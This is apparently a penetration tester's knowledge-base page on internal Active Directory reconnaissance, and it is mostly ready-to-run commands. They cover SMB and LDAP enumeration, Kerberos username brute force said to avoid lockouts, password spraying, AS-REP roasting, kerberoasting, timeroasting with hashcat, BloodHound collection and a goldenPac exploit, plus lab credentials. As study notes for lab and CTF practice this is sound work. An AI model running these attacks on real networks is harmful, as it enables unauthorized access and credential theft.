Malleum Knowledge Base

8. Internal Recon

5 min read

Scanning

nxc smb $IP
proxychains cme smb $IP 2>/dev/null

nxc smb ips.txt -u '' -p ''

cme smb ips.txt -u '' -p '' --shares
  • if Status not supported error then ntlm authentication is not supported.
  • We could configure krb5.conf, hosts file and then use -k flag in the nxc.
nxc smb DC-JPQ225 -u Rosie.Powell -p 'Cicada123' -d cicada.vl -k --shares

cme smb ips.txt -u 'guest' -p '' --shares

smbclient.py 'guest@10.10.76.112'

smbclient.py 'cicada.vl/rosie.powell@DC-JPQ225' -k

SMB signing

In a secure AD environment smb signing must be true everywhere to avoid ntlm relay attack.

Enumerate DC ip

nslookup -type=srv _ldap._tcp.dc._msdcs.sevenkingdoms.local 192.168.56.10

Poison and Relay

Do this at the start of your internal recon. Poison and relay

Enumerate DC anonymously

Only possible when anonymous signing is allowed on the DC.

enumerate users

cme smb $IP --users
cme ldap $IP --users

ldapsearch -x -H ldap://10.10.66.196 -b "DC=baby,DC=vl" "(objectClass=user)" sAMAccountName | grep "^sAMAccountName:" | awk '{print $2}' > users.txt

Do all the type of user enumeration. Sometimes the tool missies something

impacket-lookupsid anonymous@10.10.81.153

enumerate user description

nxc ldap 10.10.77.248 -u '' -p '' -M user-desc

enumerate password policy before brute force

cme smb $IP --pass-pol

enumerate auto with enum4linux

enum4linux 192.168.56.11

enumerate manually

rpcclient -U "Domain(But anything works here)\\" 192.168.56.11 -N

net rpc group members 'Domain Users' -W 'NORTH' -I '192.168.56.11' -U '%'

List guest access on shares

cme smb $IP -u '' -p '' --shares
cme smb $IP -u 'a' -p '' --shares

Ntlm theft when we have write access on a share

Ntlm theft by uploading files on SMB share

Enumerate DC’s anonymously - when anonymous sessions are not allowed

Create a user list

If anonymous login is not allowed on the DC which is the case most of the time. we could brute force the users using kerberos.

This way we can bypass the bad password count.

^60e6f3

User Enum through Brute force

nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='domain name (eg.sevenkingdoms.local)',userdb=got_users.txt" $IP
./kerbrute_linux_amd64 userenum --dc dc.office.htb -d office.htb /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt

cme smb 10.10.79.192 -u 'meow' -p '' --rid-brute

  • Discovers valid usernames by brute force querying likely usernames against a Kerberos service.

  • When an invalid username is requested the server will respond using the Kerberos error code KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN, allowing us to determine that the user name was invalid.

  • Valid user names will illicit either the TGT in a AS-REP response or the error KRB5KDC_ERR_PREAUTH_REQUIRED, signaling that the user is required to perform pre authentication.

  • This does not trigger Microsoft’s account lockout policy.

Users but No Credentials

AS-REP Roasting

impacket-GetNPUsers bruno.vl/svc_scan -no-pass -request

hashcat svc_scan_hash /usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt

^f7f50f

Password Spraying if no password lockout policy

cme smb $IP -u users.txt -p users.txt --no-bruteforce --continue-on-success

Enumerate DC with Creds

GetADUsers.py -all domain/username:password
ldapsearch -H ldap://$IP$ -D "brandon.stark@north.sevenkingdoms.local" -w iseedeadpeople -b 'DC=north,DC=sevenkingdoms,DC=local' "(&(objectCategory=person)(objectClass=user))" |grep 'distinguishedName:'

User the above password spraying techniques to fish for users with bad passwords.

Time Roasting Attack

nxc smb 10.1.15.4 -M timeroast | grep -oP '\d+:\$sntp-ms\$[a-f0-9$]+' > timeroast_clean.txt

hashcat -m 31300 timeroast_clean.txt /usr/share/seclists/Passwords/xato-net-10-million-passwords.txt --username
  • Make a clean list of it and crack it with hashcat
  • Look the 1st part rid type thing in bloodhound to find the associated computer account.

Having valid domain creds

Check ASREPROAST and KERBEROAST

cme ldap brunodc.bruno.vl -u 'svc_scan' -p 'Sunshine1' --asreproast ASREPROAST


cme ldap brunodc.bruno.vl -u 'svc_scan' -p 'Sunshine1' --kerberoasting KERBEROASTING

crackmapexec smb 10.10.254.37 -u samuel.davies -p l6fkiy9oN -M gpp_password

Kerberoasting

^073601

Clock Skew

  • Incase not able to do it with ntpdate because you are in virutal box with hardware utc
sudo date -s "$(ntpdate -q $domaicontroller | grep -oP '\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}')"

Share enum with creds

cme smb 192.168.56.10-23 -u jon.snow -p iknownothing -d north.sevenkingdoms.local --shares

Accessing the shares

smbclient.py 'core.cyber.local/george.wirth:v765#QLm^8@10.9.10.10'

Blood Hound

From Kali
bloodhound.py --zip -c All -d $Domain$ -u user@domain -p password -dc dc.domain.local

cme ldap brunodc.bruno.vl -u 'svc_scan' -p 'Sunshine1' --bloodhound -c all -ns 10.10.91.0


nxc ldap 10.10.11.5 -u mikasaAckerman -p 'IL0v3ErenY3ager'  --bloodhound -c All -d freelancer.htb --dns-server 10.10.11.5


bloodhound-python --zip -c All -d lustrous2.vl -u Thomas.myers@lustrous2.vl -dc lus2dc.lustrous2.vl --auth-method kerberos -ns 10.10.119.13 --use-ldaps
From Windows
 
.\sharphound.exe -d domain -c all --zipfilename any_name.zip
From Sliver C2

Execute it from the directory where the user has write access.

sharp-hound-4 -i -- "-c all"
Hunting with Blood Hound
show all domains and computer
MATCH p = (d:Domain)-[r:Contains*1..]->(n:Computer) RETURN p
And show all the users
MATCH p = (d:Domain)-[r:Contains*1..]->(n:User) RETURN p
Overall map of domains/groups/users
MATCH q=(d:Domain)-[r:Contains*1..]->(n:Group)<-[s:MemberOf]-(u:User) RETURN q
 the users ACL
MATCH p=(u:User)-[r1]->(n) WHERE r1.isacl=true and not tolower(u.name) contains 'vagrant' RETURN p
Unconstrained Delegation
MATCH (c1:Computer)-[:MemberOf*1..]->(g:Group) WHERE g.objectid ENDS WITH '-516' WITH COLLECT(c1.name) AS domainControllers MATCH (c2 {unconstraineddelegation:true}) WHERE NOT c2.name IN domainControllers RETURN c2
Resources on Blood hound query

SamAccountName (nopac)

SamAccountName (nopac) CVE-2021-42287

PrintNightmare

PrintNightmare

MS16-068

impacket-goldenPac $DOomin/$User:$Password@10.1.15.100

Move back to Host Recon or AD Recon below

4. Host Recon

ADtool and Pbis linux

https://book.hacktricks.xyz/network-services-pentesting/pentesting-ldap

Getting users with descritptions

./adtool -a search-user --name CN="*" --keytab=/etc/krb5.keytab -n "COREWEBDL$" | grep "CN" | while read line; do echo "$line" && ./adtool --keytab=/etc/krb5.keytab -n 'COREWEBDL$@CORE.CYBER.LOCAL' -a lookup-object --dn="$line" --attr "description" && echo "======================"; done

AD Recon (Having Shell Access)

DACL

Manual Enumeration

Delegation

Delegation

Graph View

Backlinks